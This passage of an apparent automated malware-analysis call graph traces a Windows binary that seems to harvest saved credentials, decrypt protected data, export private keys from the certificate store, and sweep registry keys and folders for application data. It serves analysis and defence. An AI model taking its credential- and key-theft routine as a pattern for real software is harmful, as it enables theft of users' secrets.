8820->8822 8823 405bcd 8821->8823 8826 405be9 8822->8826 8824 4018a0 LocalFree 8823->8824 8824->8820 8825 405bfc 10473 405ade 8825->10473 8826->8825 8828 405aad 30 API calls 8826->8828 8830 405bf7 8828->8830 8837 405c9c 8836->8837 10487 405c29 8837->10487 8840 405c29 35 API calls 8841 405cb3 8840->8841 8842 405c29 35 API calls 8841->8842 8843 405cbd 8842->8843 8843->8185 8845 408d9b 8844->8845 8846 4041dd 35 API calls 8845->8846 8847 408db5 8846->8847 10500 408b58 RegOpenKeyA 8847->10500 8850 408b58 14 API calls 8851 408dda 8850->8851 10511 408c47 RegOpenKeyA 8851->10511 8854 408c47 42 API calls 8855 408dfe 8854->8855 8855->8185 8857 40da1b 8856->8857 10530 40d825 RegOpenKeyA 8857->10530 8860 40d825 14 API calls 8861 40da43 8860->8861 8861->8185 8863 40d197 8862->8863 10541 40ce9d RegOpenKeyA 8863->10541 8866 40ce9d 16 API calls 8867 40d1bf 8866->8867 10553 40d0f6 8867->10553 8870 40d0f6 21 API calls 8871 40d1da 8870->8871 8871->8185 8873 409ef0 8872->8873 8874 401cf8 7 API calls 8873->8874 8875 409efa 8874->8875 8876 404192 30 API calls 8875->8876 8880 409f17 8875->8880 8879 409f12 8876->8879 8877 409f28 StrStrIA 8877->8880 8878 409f6d 8878->8185 8881 4018a0 LocalFree 8879->8881 8880->8877 8880->8878 8882 402272 9 API calls 8880->8882 8883 404192 30 API calls 8880->8883 8884 4018a0 LocalFree 8880->8884 8881->8880 8882->8880 8883->8880 8884->8880 8893 40c897 8885->8893 8886 40c8e5 8888 401cf8 7 API calls 8886->8888 8887 40c8a5 StrStrIA 8887->8893 8890 40c8ec 8888->8890 8889 402272 9 API calls 8889->8893 8891 40c914 8890->8891 8894 401c93 6 API calls 8890->8894 8892 401cf8 7 API calls 8891->8892 8895 40c91b 8892->8895 8893->8886 8893->8887 8893->8889 8896 404192 30 API calls 8893->8896 8901 4018a0 LocalFree 8893->8901 8897 40c8fb 8894->8897 8900 401c93 6 API calls 8895->8900 8904 40c943 8895->8904 8896->8893 8898 404192 30 API calls 8897->8898 8899 40c90f 8898->8899 8902 4018a0 LocalFree 8899->8902 8903 40c92a 8900->8903 8901->8893 8902->8891 8905 404192 30 API calls 8903->8905 8904->8185 8906 40c93e 8905->8906 8907 4018a0 LocalFree 8906->8907 8907->8904 8912 405217 8908->8912 8909 405260 10563 40515b 8909->10563 8910 405225 StrStrIA 8910->8912 8912->8909 8912->8910 8914 402272 9 API calls 8912->8914 8920 4018a0 LocalFree 8912->8920 10597 405024 8912->10597 8914->8912 8915 40515b 34 API calls 8916 405274 8915->8916 8917 40515b 34 API calls 8916->8917 8919 40527e 8917->8919 8921 40515b 34 API calls 8919->8921 8920->8912 8922 405288 8921->8922 10592 404fda 8922->10592 8925 404fda 6 API calls 8926 4052a2 8925->8926 8936 4015d8 8935->8936 8937 409b93 GetCurrentDirectoryA 8936->8937 8938 409a76 83 API calls 8937->8938 8939 409bce 8938->8939 8940 409a76 83 API calls 8939->8940 8941 409bea SetCurrentDirectoryA 8940->8941 8942 409c01 8941->8942 8942->8185 8944 408a8f 8943->8944 10624 408a5b 8944->10624 8947 408a5b 49 API calls 8948 408aa6 8947->8948 8949 408a5b 49 API calls 8948->8949 8950 408ab0 8949->8950 8951 401bb8 6 API calls 8950->8951 8952 408ac7 8951->8952 8953 408acb 8952->8953 8954 408adf 8952->8954 10631 40879b 8953->10631 8956 401bb8 6 API calls 8954->8956 8958 408af6 8956->8958 8960 408afa 8958->8960 8961 408b0e 8958->8961 8959 4018a0 LocalFree 8959->8954 8962 40879b 38 API calls 8960->8962 8963 401bb8 6 API calls 8961->8963 8964 408b09 8962->8964 8965 408b21 8963->8965 8966 4018a0 LocalFree 8964->8966 8967 408b49 8965->8967 8968 402272 9 API calls 8965->8968 8966->8961 8967->8185 8977 40e70e 8976->8977 10764 40e688 8977->10764 8979 40e723 8979->8185 8981 40a00e 8980->8981 8982 401bb8 6 API calls 8981->8982 8983 40a024 8982->8983 8984 40a047 8983->8984 8985 402272 9 API calls 8983->8985 8984->8185 8986 40a02e 8985->8986 8987 404192 30 API calls 8986->8987 8988 40a042 8987->8988 8989 4018a0 LocalFree 8988->8989 8989->8984 8991 40c18b 8990->8991 8992 40bf68 35 API calls 8991->8992 8993 40c19b 8992->8993 8993->8185 8995 40e40b 8994->8995 10787 40e391 8995->10787 8997 40e41b 8997->8185 8999 40c00b 8998->8999 9000 40bf68 35 API calls 8999->9000 9001 40c01b 9000->9001 9001->8185 9003 40df0a 9002->9003 9004 40bf68 35 API calls 9003->9004 9005 40df1a 9004->9005 9005->8185 9007 40e286 9006->9007 10799 40e062 RegOpenKeyA 9007->10799 9010 40e062 11 API calls 9011 40e2ae 9010->9011 10832 40e1ab RegOpenKeyA 9011->10832 9014 40e1ab 31 API calls 9015 40e2d3 9014->9015 9015->8185 9017 40e980 9016->9017 10867 40e824 9017->10867 9020 40e824 38 API calls 9021 40e9a8 9020->9021 9022 4041dd 35 API calls 9021->9022 9023 40e9bf 9022->9023 9023->8185 9025 40f57d 9024->9025 10885 40f519 9025->10885 9030 401c3f 5 API calls 9031 40f5aa 9030->9031 10899 40f1d7 RegOpenKeyA 9031->10899 9034 4018a0 LocalFree 9035 40f5c4 9034->9035 9036 401bb8 6 API calls 9035->9036 9037 40f5da 9036->9037 9038 40f5fe 9037->9038 9039 401c93 6 API calls 9037->9039 9040 40f138 23 API calls 9038->9040 9041 40f5e9 9039->9041 9042 40f611 9040->9042 9043 40f138 23 API calls 9041->9043 9044 40f1d7 26 API calls 9042->9044 9045 40f5f9 9043->9045 9046 40f626 9044->9046 9047 4018a0 LocalFree 9045->9047 9047->9038 9052 40d1fd 9050->9052 9051 40d3da 9051->8185 9052->9051 9053 40d268 CertOpenSystemStoreA 9052->9053 9053->9051 9060 40d282 9053->9060 9054 40d284 CertEnumCertificatesInStore 9055 40d294 CertCloseStore 9054->9055 9054->9060 9055->9051 9057 40d2b2 lstrcmpA 9057->9060 9059 40d2e9 lstrcmpA 9059->9060 9061 40d2fe CryptAcquireCertificatePrivateKey 9059->9061 9060->9054 9060->9057 9060->9059 9062 4018a0 LocalFree 9060->9062 10971 4018b7 LocalAlloc 9060->10971 9061->9060 9063 40d31b CryptGetUserKey 9061->9063 9062->9060 9064 40d3a7 CryptReleaseContext 9063->9064 9065 40d32f CryptExportKey 9063->9065 9064->9060 9066 40d348 9065->9066 9067 40d39e CryptDestroyKey 9065->9067 10972 4018b7 LocalAlloc 9066->10972 9067->9064 9069 40d350 CryptExportKey 9070 40d36d 9069->9070 9071 4018a0 LocalFree 9070->9071 9071->9067 9073 40c0f8 9072->9073 9074 40bf68 35 API calls 9073->9074 9075 40c108 9074->9075 9075->8185 9077 40e2f4 9076->9077 9078 40bf68 35 API calls 9077->9078 9079 40e304 9078->9079 9079->8185 9081 4067f3 9080->9081 9082 4041dd 35 API calls 9081->9082 9083 40680d 9082->9083 9083->8185 9085 407f70 9084->9085 10973 407d46 RegOpenKeyA 9085->10973 9088 407d46 14 API calls 9089 407f98 9088->9089 9089->8185 9091 409e62 9090->9091 9092 401bb8 6 API calls 9091->9092 9093 409e7c 9092->9093 9094 409e99 9093->9094 9095 404192 30 API calls 9093->9095 9096 401bb8 6 API calls 9094->9096 9097 409e94 9095->9097 9098 409eb0 9096->9098 9099 4018a0 LocalFree 9097->9099 9100 409ecd 9098->9100 9101 404192 30 API calls 9098->9101 9099->9094 9100->8185 9102 409ec8 9101->9102 9103 4018a0 LocalFree 9102->9103 9103->9100 9105 40c06d 9104->9105 9106 40bf68 35 API calls 9105->9106 9107 40c07d 9106->9107 9108 401bb8 6 API calls 9107->9108 9109 40c094 9108->9109 9110 40c0d7 9109->9110 9111 403fe7 30 API calls 9109->9111 9110->8185 9112 40c0b5 9111->9112 9113 403fe7 30 API calls 9112->9113 9114 40c0cf 9113->9114 9115 4018a0 LocalFree 9114->9115 9115->9110 9117 407c6c 9116->9117 10984 4079f4 RegOpenKeyA 9117->10984 9120 4079f4 14 API calls 9121 407c94 9120->9121 9121->8185 9123 40eceb 9122->9123 10995 40e9ce RegOpenKeyA 9123->10995 9126 40e9ce 18 API calls 9127 40ed13 9126->9127 9127->8185 9129 408e6b 9128->9129 11007 408e0d 9129->11007 9132 408e0d 35 API calls 9133 408e82 9132->9133 9134 408e0d 35 API calls 9133->9134 9135 408e8c 9134->9135 9135->8185 9137 406768 9136->9137 9138 4041dd 35 API calls 9137->9138 9139 406782 9138->9139 9140 401bb8 6 API calls 9139->9140 9144 40679b 9140->9144 9141 4067c5 11018 4064d0 RegOpenKeyA 9141->11018 9143 4067d2 9143->8185 9144->9141 9145 4018a0 LocalFree 9144->9145 9145->9141 9147 40a068 9146->9147 9148 4041dd 35 API calls 9147->9148 9149 40a082 9148->9149 9149->8185 9151 4048e8 9150->9151 11030 40475c RegOpenKeyA 9151->11030 9154 40475c 14 API calls 9155 404905 9154->9155 9156 40475c 14 API calls 9155->9156 9157 404912 9156->9157 11041 40464e RegOpenKeyA 9157->11041 9160 40464e 10 API calls 9161 40492c 9160->9161 9162 40464e 10 API calls 9161->9162 9163 404939 9162->9163 9163->8185 9170 40a8e5 9164->9170 9168 40a90b 11050 40a6af CoCreateInstance 9168->11050 9169 40a940 9169->8185 9170->9168 9171 40a298 CoTaskMemFree 9170->9171 9171->9168 9173 40da64 9172->9173 9174 4041dd 35 API calls 9173->9174 9175 40da7e 9174->9175 9175->8185 9177 4015d8 9176->9177 9178 409dde GetCurrentDirectoryA 9177->9178 9179 409a76 83 API calls 9178->9179 9180 409e19 9179->9180 9181 409a76 83 API calls 9180->9181 9182 409e35 SetCurrentDirectoryA 9181->9182 9183 409e4c 9182->9183 9183->8185 9185 406b60 9184->9185 9186 4041dd 35 API calls 9185->9186 9187 406b7a 9186->9187 9187->8185 9198 40c661 9188->9198 9189 40c6b6 9191 4041dd 35 API calls 9189->9191 9190 40c66f StrStrIA 9190->9198 9192 40c6cd 9191->9192 9194 401bb8 6 API calls 9192->9194 9193 402272 9 API calls 9193->9198 9195 40c6e4 9194->9195 9197 401bb8 6 API calls 9195->9197 9196 404192 30 API calls 9196->9198 9199 40c6fe 9197->9199 9198->9189 9198->9190 9198->9193 9198->9196 9200 4018a0 LocalFree 9198->9200 9201 401bb8 6 API calls 9199->9201 9200->9198 9202 40c718 9201->9202 9203 401bb8 6 API calls 9202->9203 9206 40c734 9203->9206 9204 40c777 9205 4018a0 LocalFree 9204->9205 9207 40c78d 9205->9207 9206->9204 9211 4015b3 lstrlenA 9206->9211 9208 4018a0 LocalFree 9207->9208 9209 40c795 9208->9209 9213 40c761 9211->9213 9215 4015b3 lstrlenA 9213->9215 9217 40c76c 9215->9217 9218 4015b3 lstrlenA 9217->9218 9218->9204 9220 40d7de 9219->9220 11096 40d790 9220->11096 9223 40d790 35 API calls 9224 40d7f5 9223->9224 9225 40d790 35 API calls 9224->9225 9226 40d7ff 9225->9226 9227 4041dd 35 API calls 9226->9227 9228 40d816 9227->9228 9228->8185 9230 4015d8 9229->9230 9231 40f65f GetCurrentDirectoryA 9230->9231 9232 409a76 83 API calls 9231->9232 9233 40f69a 9232->9233 9234 409a76 83 API calls 9233->9234 9235 40f6b6 SetCurrentDirectoryA GetCurrentDirectoryA 9234->9235 9236 409a76 83 API calls 9235->9236 9237 40f6fa 9236->9237 9238 409a76 83 API calls 9237->9238 9239 40f716 SetCurrentDirectoryA 9238->9239 9240 40f72d 9239->9240 9240->8185 9242 40dcd8 9241->9242 11105 40da8d RegOpenKeyA 9242->11105 9245 40da8d 14 API calls 9246 40dd00 9245->9246 9246->8185 9248 40c15a 9247->9248 9249 40bf68 35 API calls 9248->9249 9250 40c16a 9249->9250 9250->8185 9252 40e6d8 9251->9252 9253 40e688 35 API calls 9252->9253 9254 40e6ed 9253->9254 9254->8185 9256 4018b1 9255->9256 9257 4018a9 LocalFree 9255->9257 9256->8268 9257->9256 9259 40cb91 9258->9259 9260 40cb15 9258->9260 9265 401cf8 9259->9265 9260->9259 9261 40cb27 CredEnumerateA 9260->9261 9261->9259 9262 40cb4e 9261->9262 9262->9259 9263 40cb88 CredFree 9262->9263 9298 40ca54 9262->9298 9263->9259 9317 4018b7 LocalAlloc 9265->9317 9267 401d09 9268 401d15 9267->9268 9269 401d17 SHGetFolderPathA 9267->9269 9271 4018a0 LocalFree 9268->9271 9269->9268 9270 401d68 9269->9270 9270->8277 9274 403fe7 9270->9274 9272 401d35 9271->9272 9272->9270 9318 401bb8 9272->9318 9275 404006 9274->9275 9277 404001 9274->9277 9276 4018a0 LocalFree 9275->9276 9278 40418e 9276->9278 9277->9275 9279 404026 9277->9279 9280 404017 9277->9280 9278->8280 9282 401c3f 5 API calls 9279->9282 9341 401c3f 9280->9341 9283 404024 9282->9283 9284 40404a FindFirstFileA 9283->9284 9284->9275 9291 404069 9284->9291 9285 40407b lstrcmpiA 9286 404092 lstrcmpiA 9285->9286 9285->9291 9286->9291 9287 40410f StrStrIA 9288 40415e FindNextFileA 9287->9288 9287->9291 9289 404178 FindClose 9288->9289 9288->9291 9289->9275 9290 401c3f LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 9290->9291 9291->9285 9291->9287 9291->9288 9291->9290 9292 401c93 6 API calls 9291->9292 9294 403fe7 24 API calls 9291->9294 9295 4018a0 LocalFree 9291->9295 9296 4018a0 LocalFree 9291->9296 9337 40bef9 9291->9337 9346 403ead 9291->9346 9292->9291 9294->9291 9295->9288 9296->9291 9299 40ca67 9298->9299 9311 4015b3 9299->9311 9301 40ca72 9302 4015b3 lstrlenA 9301->9302 9303 40ca7d 9302->9303 9304 40ca8b StrStrIA 9303->9304 9305 40ca9c lstrlenA StrStrIA 9304->9305 9310 40cae8 9304->9310 9306 40caba 9305->9306 9314 403607 inet_addr 9306->9314 9308 40cac8 9308->9310 9310->9262 9312 4015bc lstrlenA 9311->9312 9313 4015c6 9311->9313 9312->9313 9313->9301 9315 403617 gethostbyname 9314->9315 9316 403623 9314->9316 9315->9316 9316->9308 9317->9267 9319 401bc4 9318->9319 9322 401ad4 9319->9322 9324 401ae2 RegOpenKeyExA 9322->9324 9325 401b91 9324->9325 9326 401b22 RegQueryValueExA 9324->9326 9327 401bb3 9325->9327 9330 401ad4 2 API calls 9325->9330 9328 401b89 RegCloseKey 9326->9328 9329 401b3d 9326->9329 9327->9272 9328->9325 9329->9328 9336 4018b7 LocalAlloc 9329->9336 9330->9327 9332 401b59 RegQueryValueExA 9336->9332 9338 40bf08 9337->9338 9342 401c49 lstrlenA lstrlenA 9341->9342 9497 4018b7 LocalAlloc 9342->9497 9345 401c78 lstrcpyA lstrcatA 9345->9283 9498 401e00 ExpandEnvironmentStringsA 9346->9498 9497->9345 9499 401e39 9498->9499 9500 401e16 9498->9500 9534 401bb8 6 API calls 9533->9534 9535 405ce6 9534->9535 9536 405cff 9535->9536 9555 404192 9535->9555 9537 401bb8 6 API calls 9536->9537 9539 405d15 9537->9539 9541 405d2e 9539->9541 9543 404192 30 API calls 9539->9543 9548 4041dd 9541->9548 9542 4018a0 LocalFree 9542->9536 9545 405d29 9543->9545 9547 4018a0 LocalFree 9545->9547 9547->9541 9558 4041ac 9548->9558 9551 4041ac 35 API calls 9552 404206 9551->9552 9553 4041ac 35 API calls 9552->9553 9554 404219 9553->9554 9554->8285 9556 403fe7 30 API calls 9555->9556 9557 4041a8 9556->9557 9557->9542 9559 401cf8 7 API calls 9558->9559 9560 4041b7 9559->9560 9561 4041d9 9560->9561 9567 401c93 9560->9567 9561->9551 9564 404192 30 API calls 9569 401c9d lstrlenA lstrlenA 9567->9569 9575 4018b7 LocalAlloc 9569->9575 9571 401ccc lstrcpyA lstrcatA 9572 401cf1 9571->9572 9573 401ce9 9571->9573 9572->9564 9574 4018a0 LocalFree 9573->9574 9574->9572 9575->9571 9577 4073bf 9576->9577 9582 407201 9576->9582 9577->8291 9578 407208 RegEnumKeyExA 9579 407231 RegCloseKey 9578->9579 9578->9582 9579->9577 9581 401c3f LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 9581->9582 9582->9578 9582->9581 9583 401bb8 6 API calls 9582->9583 9584 4015b3 lstrlenA 9582->9584 9585 4018a0 LocalFree 9582->9585 9586 4071e1 11 API calls 9582->9586 9583->9582 9584->9582 9585->9582 9586->9582 9588 4015e3 9587->9588 9588->8295 9590 409ae2 9589->9590 9591 409a8b 9589->9591 9620 4018b7 LocalAlloc 9590->9620 9592 401bb8 6 API calls 9591->9592 9594 409a9d 9592->9594 9594->9590 9621 402272 9594->9621 9595 409aec RegOpenKeyA 9596 409b72 9595->9596 9597 409b02 9595->9597 9599 4018a0 LocalFree 9596->9599 9600 409b09 RegEnumKeyExA 9597->9600 9606 401c3f 5 API calls 9597->9606 9610 401c93 6 API calls 9597->9610 9614 409a76 79 API calls 9597->9614 9616 4018a0 LocalFree 9597->9616 9602 409b7a 9599->9602 9600->9597 9603 409b2e RegCloseKey 9600->9603 9602->8298 9603->9596 9604 409add 9607 4018a0 LocalFree 9604->9607 9606->9597 9607->9590 9608 401cf8 7 API calls 9609 409ab6 9608->9609 9611 409ad5 9609->9611 9613 401c93 6 API calls 9609->9613 9610->9597 9612 4018a0 LocalFree 9611->9612 9612->9604 9615 409ac3 9613->9615 9614->9597 9616->9597 9620->9595 9622 401c3f 5 API calls 9621->9622 9623 402281 lstrlenA 9622->9623 9624 402290 9623->9624 9625 40229f StrStrIA 9623->9625 9624->9625 9626 4022b2 StrRChrIA 9625->9626 9627 4022ae 9625->9627 9628 4022c0 lstrlenA 9626->9628 9627->9626 9630 4022d3 9628->9630 9630->9604 9630->9608 9814 40d5bd 9813->9814 9823 40d40e 9813->9823 9814->8304 9815 40d415 RegEnumKeyExA 9816 40d43e RegCloseKey 9815->9816 9815->9823 9816->9814 9817 401c3f LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 9817->9823 9819 401bb8 6 API calls 9819->9823 9820 40d3eb 11 API calls 9820->9823 9821 4018a0 LocalFree 9821->9823 9822 4015b3 lstrlenA 9822->9823 9823->9815 9823->9817 9823->9819 9823->9820 9823->9821 9823->9822 9825 406d79 9824->9825 9830 406bac 9824->9830 9825->8309 9826 406bb3 RegEnumKeyExA 9827 406bdc RegCloseKey 9826->9827 9826->9830 9827->9825 9829 401c3f LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 9829->9830 9830->9826 9830->9829 9831 401bb8 6 API calls 9830->9831 9832 4018a0 LocalFree 9830->9832 9834 4015b3 lstrlenA 9830->9834 9852 40421d 9830->9852 9831->9830 9832->9830 9834->9830 9836 401d7d 2 API calls 9835->9836 9837 406e04 9836->9837 9838 406e08 9837->9838 9839 406e0d 9837->9839 9838->8334 9840 401e44 7 API calls 9839->9840 9841 406e19 9840->9841 9853 4042a2 9852->9853 9854 404246 9852->9854 9853->9830 9854->9853 9855 404263 CryptUnprotectData 9854->9855 9855->9853 9857 404273 9855->9857 9856 40429a LocalFree 9856->9853 9857->9853 9857->9856 9868 4074bb 9867->9868 9873 40742c 9867->9873 9868->8366 9869 407433 RegEnumValueA 9870 40745c RegCloseKey 9869->9870 9869->9873 9870->9868 9872 401bb8 6 API calls 9872->9873 9873->9869 9873->9872 9874 4018a0 LocalFree 9873->9874 9874->9873 9876 401bb8 6 API calls 9875->9876 9877 40edb1 9876->9877 9878 40edcb 9877->9878 9903 40ed22 9877->9903 9880 401bb8 6 API calls 9878->9880 9882 40eddf 9880->9882 9884 40edf9 9882->9884 9885 40ed22 30 API calls 9882->9885 9886 401bb8 6 API calls 9884->9886 9888 40edf1 9885->9888 9887 40ee0d 9886->9887 9890 4018a0 LocalFree 9888->9890 9890->9884 9904 404192 30 API calls 9903->9904 9905 40ed3d 9904->9905 9906 404192 30 API calls 9905->9906 9907 40ed52 9906->9907 9908 401e00 4 API calls 9907->9908 9917 404309 9916->9917 9918 4042cb GetProcAddress 9916->9918 9917->8391 9918->9917 9919 4042da GetProcAddress 9918->9919 9919->9917 9920 4042eb GetCurrentProcess 9919->9920 9921 4042f9 9920->9921 9921->8391 9921->9917 9922->8393 9924 401595 9923->9924 9924->8395 9926 404322 9925->9926 9927 404334 9925->9927 9926->9927 9928 40433b AllocateAndInitializeSid 9926->9928 9927->8398 9929 40437c 9928->9929 9930 40437e CheckTokenMembership 9928->9930 9929->8398 9931 404398 9930->9931 9932 40439f FreeSid 9930->9932 9931->9932 9932->8398 9934 40263e 18 API calls 9933->9934 9935 4043c1 9934->9935 9994 40ae39 9993->9994 9999 40ad25 9993->9999 9994->8415 9995 40ad2c RegEnumKeyExA 9996 40ad55 RegCloseKey 9995->9996 9995->9999 9996->9994 9998 401c3f LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 9998->9999 9999->9995 9999->9998 10000 401bb8 6 API calls 9999->10000 10001 4018a0 LocalFree 9999->10001 10002 40ad02 21 API calls 9999->10002 10004 40aa69 9999->10004 10000->9999 10001->9999 10002->9999 10067 4018b7 LocalAlloc 10004->10067 10006 40aa79 10068 4018b7 LocalAlloc 10006->10068 10008 40aa86 10069 4018b7 LocalAlloc 10008->10069 10010 40aa93 10070 4018b7 LocalAlloc 10010->10070 10012 40aaa0 10071 4018b7 LocalAlloc 10012->10071 10014 40aaad 10072 4018b7 LocalAlloc 10014->10072 10016 40aaba 10073 4018b7 LocalAlloc 10016->10073 10018 40aac7 7 API calls 10067->10006 10068->10008 10069->10010 10070->10012 10071->10014 10072->10016 10073->10018 10082 401cf8 7 API calls 10081->10082 10083 407878 10082->10083 10084 4078b5 10083->10084 10085 401c93 6 API calls 10083->10085 10084->8431 10086 407887 10085->10086 10087 404192 30 API calls 10086->10087 10088 40789c 10087->10088 10089 404192 30 API calls 10088->10089 10090 4078b0 10089->10090 10091 4018a0 LocalFree 10090->10091 10091->10084 10093 407722 10092->10093 10094 407869 10092->10094 10095 407729 RegEnumKeyExA 10093->10095 10098 401c3f LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 10093->10098 10099 401bb8 6 API calls 10093->10099 10100 4018a0 LocalFree 10093->10100 10101 404192 30 API calls 10093->10101 10102 407702 34 API calls 10093->10102 10094->8442 10095->10093 10096 407752 RegCloseKey 10095->10096 10096->10094 10098->10093 10099->10093 10100->10093 10101->10093 10102->10093 10104 401bb8 6 API calls 10103->10104 10105 40531f 10104->10105 10106 40537f 10105->10106 10107 401c3f 5 API calls 10105->10107 10106->8484 10108 405333 10107->10108 10131 4052e6 10108->10131 10111 401c3f 5 API calls 10112 40534e 10111->10112 10113 4052e6 16 API calls 10112->10113 10114 40535c 10113->10114 10115 401c3f 5 API calls 10114->10115 10116 405369 10115->10116 10117 4052e6 16 API calls 10116->10117 10118 405377 10117->10118 10119 4018a0 LocalFree 10118->10119 10119->10106 10132 405305 10131->10132 10133 4052ef 10131->10133 10132->10111 10134 403ead 16 API calls 10133->10134 10135 4052fd 10134->10135 10136 4018a0 LocalFree 10135->10136 10136->10132 10163 40bf32 10150->10163 10153 40bf32 35 API calls 10154 40bf99 10153->10154 10155 40bf32 35 API calls 10154->10155 10156 40bfb0 10155->10156 10157 40bf32 35 API calls 10156->10157 10158 40bfc7 10157->10158 10159 40bf32 35 API calls 10158->10159 10160 40bfde 10159->10160 10161 40bf32 35 API calls 10160->10161 10162 40bff5 10161->10162 10162->8527 10164 401cf8 7 API calls 10163->10164 10165 40bf3d 10164->10165 10166 40bf64 10165->10166 10167 401c93 6 API calls 10165->10167 10166->10153 10168 40bf4a 10167->10168 10169 403fe7 30 API calls 10168->10169 10170 40bf5f 10169->10170 10171 4018a0 LocalFree 10170->10171 10171->10166 10173 40649b 10172->10173 10179 406261 10172->10179 10173->8555 10174 406268 RegEnumKeyExA 10175 406291 RegCloseKey 10174->10175 10174->10179 10175->10173 10177 401c3f 5 API calls 10177->10179 10178 401c93 6 API calls 10178->10179 10179->10174 10179->10177 10179->10178 10180 401bb8 6 API calls 10179->10180 10181 4018a0 LocalFree 10179->10181 10182 4015b3 lstrlenA 10179->10182 10180->10179 10181->10179 10182->10179 10184 406b19 10183->10184 10189 406978 10183->10189 10184->8559 10185 40697f RegEnumKeyExA 10186 4069a8 RegCloseKey 10185->10186 10185->10189 10186->10184 10188 401c3f LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 10188->10189 10189->10185 10189->10188 10190 401bb8 6 API calls 10189->10190 10191 4018a0 LocalFree 10189->10191 10192 4015b3 lstrlenA 10189->10192 10190->10189 10191->10189 10192->10189 10194 401cf8 7 API calls 10193->10194 10196 40c4b5 10194->10196 10195 40c4e2 10197 401cf8 7 API calls 10195->10197 10196->10195 10198 401c93 6 API calls 10196->10198 10199 40c4ea 10197->10199 10200 40c4c4 10198->10200 10201 40c517 10199->10201 10204 401c93 6 API calls 10199->10204 10202 403fe7 30 API calls 10200->10202 10201->8576 10203 40c4dd 10202->10203 10205 4018a0 LocalFree 10203->10205 10206 40c4f9 10204->10206 10205->10195 10207 403fe7 30 API calls 10206->10207 10208 40c512 10207->10208 10209 4018a0 LocalFree 10208->10209 10209->10201 10211 407194 10210->10211 10217 406fd6 10210->10217 10211->8592 10212 406fdd RegEnumKeyExA 10213 407006 RegCloseKey 10212->10213 10212->10217 10213->10211 10215 401c3f LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 10215->10217 10216 401bb8 6 API calls 10216->10217 10217->10212 10217->10215 10217->10216 10218 4015b3 lstrlenA 10217->10218 10219 4018a0 LocalFree 10217->10219 10220 406fb6 11 API calls 10217->10220 10218->10217 10219->10217 10220->10217 10222 401cf8 7 API calls 10221->10222 10223 40c568 10222->10223 10224 40c590 10223->10224 10225 401c93 6 API calls 10223->10225 10224->8602 10226 40c577 10225->10226 10227 404192 30 API calls 10226->10227 10228 40c58b 10227->10228 10229 4018a0 LocalFree 10228->10229 10229->10224 10230->8609 10232 404a8e 10231->10232 10234 40496c 10231->10234 10232->8615 10233 404985 10236 401bb8 6 API calls 10233->10236 10234->10233 10235 401c93 6 API calls 10234->10235 10235->10233 10237 40499f 10236->10237 10238 4049c1 10237->10238 10240 401c3f 5 API calls 10237->10240 10239 401bb8 6 API calls 10238->10239 10241 4049d7 10239->10241 10242 4049ad 10240->10242 10244 4049f9 10241->10244 10247 401c3f 5 API calls 10241->10247 10243 404948 16 API calls 10242->10243 10245 4049b7 10243->10245 10246 401bb8 6 API calls 10244->10246 10248 4018a0 LocalFree 10245->10248 10249 404a10 10246->10249 10250 4049e5 10247->10250 10251 4049bc 10248->10251 10252 404a32 10249->10252 10255 401c3f 5 API calls 10249->10255 10253 404948 16 API calls 10250->10253 10254 4018a0 LocalFree 10251->10254 10256 401bb8 6 API calls 10252->10256 10257 4049ef 10253->10257 10254->10238 10258 404a1e 10255->10258 10260 4018a0 LocalFree 10257->10260 10287 401cf8 7 API calls 10286->10287 10288 407538 10287->10288 10289 40758a 10288->10289 10290 401c93 6 API calls 10288->10290 10289->8688 10291 407547 10290->10291 10292 404192 30 API calls 10291->10292 10293 40755d 10292->10293 10294 404192 30 API calls 10293->10294 10295 407571 10294->10295 10296 404192 30 API calls 10295->10296 10297 407585 10296->10297 10298 4018a0 LocalFree 10297->10298 10298->10289 10300 401cf8 7 API calls 10299->10300 10301 4075de 10300->10301 10302 407689 10301->10302 10303 4075fa 10301->10303 10304 401c93 6 API calls 10301->10304 10302->8706 10305 401c3f 5 API calls 10303->10305 10304->10303 10306 40760a 10305->10306 10307 403ead 16 API calls 10306->10307 10308 407619 10307->10308 10309 4018a0 LocalFree 10308->10309 10310 40761e 10309->10310 10311 401c3f 5 API calls 10310->10311 10312 40762b 10311->10312 10313 403ead 16 API calls 10312->10313 10314 40763a 10313->10314 10315 4018a0 LocalFree 10314->10315 10316 40763f 10315->10316 10317 401c3f 5 API calls 10316->10317 10331 406209 10330->10331 10337 406048 10330->10337 10331->8719 10332 40604f RegEnumKeyExA 10333 406078 RegCloseKey 10332->10333 10332->10337 10333->10331 10335 401c3f LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 10335->10337 10336 401bb8 6 API calls 10336->10337 10337->10332 10337->10335 10337->10336 10338 4018a0 LocalFree 10337->10338 10339 406025 11 API calls 10337->10339 10340 4015b3 lstrlenA 10337->10340 10338->10337 10339->10337 10340->10337 10386 405685 10341->10386 10387 401bb8 6 API calls 10386->10387 10388 40569e 10387->10388 10389 401bb8 6 API calls 10388->10389 10390 4056b4 10389->10390 10391 401bb8 6 API calls 10390->10391 10392 4056ca 10391->10392 10393 401bb8 6 API calls 10392->10393 10394 4056e2 10393->10394 10395 401bb8 6 API calls 10394->10395 10396 4056f8 10395->10396 10397 401bb8 6 API calls 10396->10397 10399 405710 10397->10399 10398 4018a0 LocalFree 10400 4057b9 10398->10400 10403 4015b3 lstrlenA 10399->10403 10420 40578c 10399->10420 10405 405747 10403->10405 10407 4015b3 lstrlenA 10405->10407 10420->10398 10422 404cd3 10421->10422 10425 404cce 10421->10425 10423 4018a0 LocalFree 10422->10423 10424 404e3c 10423->10424 10424->8779 10425->10422 10426 404cf3 10425->10426 10427 404ce4 10425->10427 10428 401c3f 5 API calls 10426->10428 10429 401c3f 5 API calls 10427->10429 10430 404cf1 10428->10430 10429->10430 10431 404d17 FindFirstFileA 10430->10431 10431->10422 10441 404d36 10431->10441 10432 404d44 lstrcmpiA 10435 404d5b lstrcmpiA 10432->10435 10443 404d56 10432->10443 10433 404da9 StrStrIA 10434 404e0c FindNextFileA 10433->10434 10433->10441 10436 404e26 FindClose 10434->10436 10434->10441 10435->10443 10436->10422 10437 401c3f 5 API calls 10437->10441 10438 401c3f 5 API calls 10438->10443 10439 401c93 6 API calls 10439->10441 10440 